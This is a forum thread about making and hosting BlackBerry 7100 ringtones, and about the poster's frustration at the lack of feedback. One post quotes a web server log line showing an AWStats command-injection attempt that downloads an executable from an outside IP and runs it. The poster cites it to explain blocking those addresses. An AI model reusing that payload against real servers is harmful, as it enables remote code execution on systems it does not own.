Please Login to Remove!

Hey all,

I was messin around, making it so i could download my own tunes to my 7100t, and while i was doin it, learned how to do some for a couple different flavors of Samsung phones too.

I dont use any dynamic dns or anything is why its just an ip, but you are all welcome to look thru it.

Cool stuff... nice, simple, no BS... How about posting a little howto so that others can do it? You don't have to, but it would be nice.

cd.

Ok, for the walkthru on how to make ringtones for the 7100/7105 series, look here:

http://www.blackberryforums.com/showthread.php?t=4764

Its on of the sticky threads here, and its the way i did it pretty much. Hardest part is getting file sizes right (the limitations...keeping the adp file under 128Kb, or it wont load on the blackberry)

P.S. Can host ringtones for others if you like, I just need the file emailed to me, or give me a link to where i can download it (and then put it in my server directory)

Anyone know how to reduce the volume in the finished .adp file?

Also, been blocking some ip's based on what they are doing, like:

211.20.11.206, -, 12/13/2005, 6:24:59, W3SVC1, TOMMY, 192.168.0.101, 0, 276, 4203, 404, 3, GET, /awstats/awstats.pl, configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024 %2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen %3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY ;echo|,

So the whole 211.* block has been blocked. If i've blocked you and i shouldnt have, [email address]

if your avatar is an indication, and you are in fact using a 7130, then your handset doesn't know what the heck .adp files are! stick with the easy and widely available .mp3 tones. enjoy the simplicity.

yes, true. but i just like exploring all my options, especially since there's ringtones in .adp that i can't find in .mp3.. and plus, .mp3 files are limited! i believe the max size mp3 i can have is 120k. adpcm files are only 4bit audio, so it should be super small.. jus wanted to give it a shot. would love to know how to get it going, as my the specs listed for my phone supports adpcm files.. oddly enough, it doesn't list mp3 support. lol.

The adp file isnt so perfect either. 128k max, wich is about 15 seconds of a clip.

What songs you lookin for that you cant find an mp3 of?

Made some changes....should be more friendly on the blackberry screens. Tried again to get the script mentioned by:

Hope that may help. I don't see why it would need to be WAP/WML but rather stripped down HTML/PHP (and then supported by most updated BBs).
I got it working. At least functionaly. Not sure yet how to force the table to one screen wide, so some have 2 lines.

Angry

And, since no one wants to help (meaning i've asked a few questions, and no ones even answered or noticed i've asked a question), the site will go offline to the public at midnight tonight.

12/15/2005 11:59pm pst.

Get em before then!

I truly find it sad, that everyone will surely download, but when asked for feedback, its silent.

Because you don't get instant feedback on your questions you take away the ringtones and leave a message on the site telling people to f!*# off? What's with that? Give people a couple days to respond. This forum is helpful, but most of us have other priorities in life like family, jobs, school, volunteer work, etc. A little patience goes a long way.

Hey TheRinger,
Are there any plans to reactivate your site? I would be happy to provide feedback in exchange for free ringtones (as long as they work).

I think we should boycott his sight if he does. Did you see his site with the graphics and vulgar language?

You people make me laugh.

No, i'm not 12, i'm about 5 months from 32.

I'll help you boycott the site tho, since it's not going to be back up.

Instant feedback? That never happens, but over a week, and no feedback at all, be it about the site, or about questions i asked. Seems it's all about people wanting, but never giving.

Seems like its all people wanting... Why do people answer any question at all on this forum? They get nothing in return. Although it's your decision to remove your site, being angry that you didn't get an answer or feedback from a free site doesn't seem really mature.
